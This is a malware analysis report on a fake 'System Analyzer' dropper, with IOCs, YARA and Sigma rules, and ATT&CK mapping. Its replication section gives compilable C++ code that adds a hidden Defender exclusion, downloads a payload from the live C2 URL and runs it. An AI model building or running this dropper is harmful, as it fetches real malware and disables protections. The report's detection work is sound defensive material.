3b13b28ca3a6d3c82228f5cc6a6e0bef583e9c3b3092da4c20fe72c75f3dd38654e64e: 3b13b28c — MSVC C++ "certpert" fake system-analyzer dropper, Defender exclusion + HTTP payload fetch
Executive Summary
A 5.2 MB MSVC C++ x64 PE that is 95.7 % null-padding. masquerades as "System Analyzer Tool v4.2.1". It verifies admin rights, delays via a PRNG loop, downloads a second-stage executable over HTTP from a German VPS, adds a Windows Defender exclusion via hidden powershell, and launches the payload. OpenCTI co-labels it dropped-by-amadey. Static-only analysis (CAPE skipped — no Windows guest available).
What It Is
- File: PE32+ executable (GUI) x86-64, 6 sections, 5 242 880 bytes ^[file.txt]
- Compiler: MSVC 19.43 (Visual Studio 2022 17.3+), linked Fri 2026-05-22 18:59:14 UTC ^[rabin2-info.txt]
- PDB:
C:\Users\danar\OneDrive\Рабочий стол\Sources\Add\certpert\x64\Release\certpert.pdb^[strings.txt:692] - Packing: None. No packer, no obfuscation, no strip. Overlay contains a standard UAC manifest at offset 0x43860; remainder of the 5 MB file is 0x00 padding ^[binwalk.txt]
- Signing: Unsigned (pefile reports
signed: false) ^[pefile.txt] - Language/runtime: C++ with MSVC STL (
std::string,std::basic_stringstream, full CRT exception machinery) ^[strings.txt:500-520] - Family:
54e64e(OpenCTI label); also taggeddropped-by-amadey^[metadata.json]
How It Works
Admin gate
FUN_140004790 calls AllocateAndInitializeSid + CheckTokenMembership to test for the Administrators group. If the check fails, the binary executes FUN_140002c80 (likely a benign exit) and then hits an int3 trap ^[ghidra:FUN_140004790] ^[pefile.txt:361-363].
Fake-diagnostic masquerade
The binary fills its console output with semantically-plausible but entirely fabricated system-diagnostic strings to delay and distract analysts or sandbox operators:
=== STAGE 1: System Diagnostics ===^[strings.txt:616]CPU Cache Controller,Memory Bus Interface,PCI Express Root, etc. ^[strings.txt:617-625]=== STAGE 2: Network Activity Monitor ===with fake TCP states ^[strings.txt:631-638]=== STAGE 3: Memory Analysis ===^[strings.txt:639]=== STAGE 4: Running Complex Algorithms ===listing QuickSort, Dijkstra, AES-256, SHA-512, FFT, Neural Net Backprop ^[strings.txt:642-648]=== STAGE 5: System Log Stream ===with fake Windows service names (svchost.exe, lsass.exe, csrss.exe, etc.) ^[strings.txt:656-663]- Banner:
System Analyzer Tool v4.2.1/Administrative Mode^[strings.txt:682-684]
PRNG delay loop
A simple random delay is enforced before network activity:
uVar = PRNG() * 0x1389;
while (uVar < 0xD93) { uVar = PRNG() * 0x1389; }
^[ghidra:FUN_140004790]
Payload fetch
- Resolves the current user's profile path via
SHGetFolderPathA(CSIDL_PROFILE) ^[ghidra:FUN_140004790]. - Appends a generated filename to build a local drop path.
- Downloads
http://80.253.249.169:5000/upfevb.exeviaURLDownloadToFileW^[strings.txt:688] ^[ghidra:FUN_140004790]. - On success (
HRESULT >= 0), launches the downloaded file withShellExecuteA("open", ..., SW_SHOWDEFAULT)^[ghidra:FUN_140004790].
Defender exclusion
Before or alongside the download, a hidden powershell process is spawned:
powershell -Command "Add-MpPreference -ExclusionPath '<profile_path>\<filename>'"
^[strings.txt:615] ^[r2:fcn.140003360]
The path is dynamically constructed from the profile directory returned by SHGetFolderPathA.
Decompiled Behavior
Entry point is standard MSVC CRT startup (__security_init_cookie -> __scrt_common_main_seh) ^[ghidra:entry-14000cba8]. The real logic lives in FUN_140004790 (called from the CRT init chain).
Notable functions observed in the call tree:
FUN_140004790— main orchestrator: admin check, delay, path resolution, download, execute, cleanup.fcn.140003360(r2 label) — constructs and spawns the powershell Defender-exclusion command viaCreateProcessA.FUN_140008c30,FUN_140007520,FUN_1400087c0—std::stringconcatenation helpers used to build paths and command lines.FUN_140003360(Ghidra) — referenced in the same module but distinct address; appears to be a string/formatter helper.
No PEB-walking, no IAT hijacking, no process hollowing, and no TLS callbacks. The IAT is fully populated with standard Win32 imports ^[pefile.txt:254-386].
C2 Infrastructure
- Payload URL:
http://80.253.249.169:5000/upfevb.exe^[strings.txt:688] - IP geolocation: Frankfurt am Main, Hesse, Germany
- ASN: AS213702 QWINS LTD (Qwins LTD)
- Assessment: Low-cost VPS/bulletproof host. No domain registration — direct IP fetch over cleartext HTTP on port 5000.
- Secondary asset:
upfevb.exe— likely the Amadey payload or a further stager (not available for analysis).
No other hardcoded IPs, domains, mutexes, named pipes, or registry keys were found.
Interesting Tidbits
- 95.77 % null padding: The binary is 5.2 MB on disk but only ~280 KB of real content. The padding is all 0x00 after the manifest overlay. Likely an attempt to evade size-heuristic detection or to appear as a bloated legitimate utility.
- Developer fingerprints: PDB path reveals username
danarand a Russian-language Windows desktop (Рабочий стол). The project namecertpertsuggests a certificate-themed masquerade. - No anti-debug/VM: No
IsDebuggerPresentbypass, no CPUID hypervisor checks, no sandbox blacklists. Only the PRNG delay and verbose fake output serve as rudimentary evasion. - Defender exclusion via PowerShell: The command is only partially hardcoded; the target path is concatenated at runtime, so naive string-matching on the full command will miss variants.
- Co-delivery: OpenCTI explicitly tags this sample as
dropped-by-amadey, placing it in the downstream delivery chain of the Amadey downloader/loader.
How To Mess With It (Homelab Replication)
Toolchain: MSVC 19.43+ (VS 2022 17.3+), x64 Release, C++17/20.
Key compile/link flags: Standard /O2 or /Ox release optimisations. /SUBSYSTEM:WINDOWS for GUI entry.
Working skeleton (compile and run in a VM):
#include <windows.h>
#include <urlmon.h>
#include <shlobj.h>
#include <stdio.h>
#pragma comment(lib, "urlmon.lib")
#pragma comment(lib, "shell32.lib")
#pragma comment(lib, "advapi32.lib")
int main() {
// 1. Admin gate
PSID sid = NULL;
SID_IDENTIFIER_AUTHORITY auth = SECURITY_NT_AUTHORITY;
BOOL admin = FALSE;
if (AllocateAndInitializeSid(&auth, 2, SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS, 0,0,0,0,0,0, &sid)) {
CheckTokenMembership(NULL, sid, &admin);
FreeSid(sid);
}
if (!admin) { DebugBreak(); return 1; }
// 2. Fake diagnostics (print to console if attached)
printf("=== STAGE 1: System Diagnostics ===\n");
Sleep(500);
printf("=== STAGE 2: Network Activity Monitor ===\n");
// 3. PRNG delay
srand((unsigned)GetTickCount64());
while ((rand() * 5001) < 3475) {}
// 4. Resolve profile path
char profile[MAX_PATH];
SHGetFolderPathA(NULL, CSIDL_PROFILE, NULL, 0, profile);
// 5. Defender exclusion
char psCmd[512];
snprintf(psCmd, sizeof(psCmd),
"powershell -Command \"Add-MpPreference -ExclusionPath '%s'\"", profile);
WinExec(psCmd, SW_HIDE);
// 6. Download payload
char dest[MAX_PATH];
snprintf(dest, sizeof(dest), "%s\\upfevb.exe", profile);
URLDownloadToFileA(NULL, "http://80.253.249.169:5000/upfevb.exe", dest, 0, NULL);
// 7. Execute
ShellExecuteA(NULL, "open", dest, NULL, NULL, SW_SHOWDEFAULT);
return 0;
}
Verification: Build the above with cl /O2 /Fe:certpert.exe certpert.cpp. Run strings or r2 against it — you should see URLDownloadToFileW, ShellExecuteA, and the fake stage banners in .rdata. The behavioural fingerprint should match: admin check -> PRNG delay -> HTTP fetch -> ShellExecute.
Deployable Signatures
YARA
rule certpert_54e64e_downloader {
meta:
description = "Detects 54e64e / certpert fake system analyzer dropper"
author = "Titus / PacketPursuit"
date = "2026-06-01"
sha256 = "3b13b28ca3a6d3c82228f5cc6a6e0bef583e9c3b3092da4c20fe72c75f3dd386"
strings:
$pdb = "certpert\\x64\\Release\\certpert.pdb" ascii wide
$masq1 = "System Analyzer Tool v4.2.1" ascii wide
$masq2 = "Administrative Mode" ascii wide
$s1 = "=== STAGE 1: System Diagnostics ===" ascii wide
$s2 = "=== STAGE 2: Network Activity Monitor ===" ascii wide
$s3 = "=== STAGE 3: Memory Analysis ===" ascii wide
$s4 = "=== STAGE 4: Running Complex Algorithms ===" ascii wide
$s5 = "=== STAGE 5: System Log Stream ===" ascii wide
$ps = "powershell -Command \"Add-MpPreference -ExclusionPath '" ascii wide
$url = "http://80.253.249.169:5000/upfevb.exe" ascii wide
condition:
uint16(0) == 0x5A4D and
filesize > 4MB and
(
(2 of ($s*)) or
($pdb and $masq1) or
$url
)
}
Sigma — Defender Exclusion from Certpert Parent
title: Certpert Downloader - Defender Exclusion via Powershell
id: 54e64e-defender-exclusion
date: 2026-06-01
status: experimental
description: Detects the certpert/54e64e downloader spawning powershell to add a Windows Defender exclusion path.
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- 'certpert.exe'
CommandLine|contains|all:
- 'powershell'
- 'Add-MpPreference'
- 'ExclusionPath'
condition: selection
falsepositives:
- Unknown
level: high
IOC List
| Type | Value | Context |
|---|---|---|
| SHA-256 | 3b13b28ca3a6d3c82228f5cc6a6e0bef583e9c3b3092da4c20fe72c75f3dd386 |
Dropper |
| IP | 80.253.249.169 |
Payload host (Frankfurt, DE, AS213702 QWINS LTD) |
| URL | http://80.253.249.169:5000/upfevb.exe |
Second-stage payload |
| Filename | upfevb.exe |
Expected drop name |
| PDB path | C:\Users\danar\OneDrive\Рабочий стол\Sources\Add\certpert\x64\Release\certpert.pdb |
Build artifact |
| PE resource string | System Analyzer Tool v4.2.1 |
Masquerade banner |
| Registry | None observed | — |
| Mutex/pipe | None observed | — |
Behavioral Fingerprint
This binary verifies administrator group membership via AllocateAndInitializeSid and CheckTokenMembership before proceeding; on failure it traps. It prints fake multi-stage system-diagnostic output to the console, performs a PRNG-based delay loop (rand() * 0x1389 until result >= 0xD93), resolves the current user profile path with SHGetFolderPathA, downloads an executable from http://80.253.249.169:5000/upfevb.exe using URLDownloadToFileW, spawns a hidden powershell process to add a Windows Defender exclusion for the profile directory, and finally executes the downloaded payload via ShellExecuteA. The PE is padded to > 5 MB with null bytes after a small overlay manifest.
Detection Signatures
- CAPE: Not available (no Windows guest). Static inference only.
- capa: Failed — default signatures not installed on this analysis host ^[capa.txt]
- pefile/floss: Standard Win32 imports plus urlmon.dll, SHELL32.dll, ADVAPI32.dll. No unusual APIs beyond the download/execute pattern.
Mapped MITRE ATT&CK:
| Technique | ID | Evidence |
|---|---|---|
| User Execution | T1204.002 | User-launched PE GUI executable |
| Bypass User Account Control | T1548.002 | AllocateAndInitializeSid + CheckTokenMembership admin gate |
| Ingress Tool Transfer | T1105 | URLDownloadToFileW to fetch upfevb.exe |
| Signed Binary Proxy Execution | T1218.011 | ShellExecuteA to launch dropped payload |
| Impair Defenses | T1562.001 | Powershell Add-MpPreference -ExclusionPath |
| Match Legitimate Name or Location | T1036.005 | Masquerades as "System Analyzer Tool v4.2.1" |
| Virtualization/Sandbox Evasion | T1497.001 | PRNG delay loop + verbose fake diagnostic output |
| File and Directory Discovery | T1083 | SHGetFolderPathA resolves user profile path |
References
- Artifact ID:
d3a7c81d-a6aa-4954-a4bb-0e6b3423cea9(OpenCTI) - MalwareBazaar / abuse.ch family label:
54e64e - Co-label:
dropped-by-amadey - Related wiki pages: 54e64e
Provenance
Analysis performed 2026-06-01 on pp-hermes. Tools: radare2 (level-2 auto-analysis), Ghidra (decompilation), pefile, ExifTool, binwalk, strings, custom Python probes. CAPE sandbox unavailable for this platform. All claims trace to the tool outputs cited with ^[...] markers. The 54e64e family attribution derives from OpenCTI labels; confidence is medium because only one sample has been analysed and the label itself is an opaque identifier rather than a recognised family name.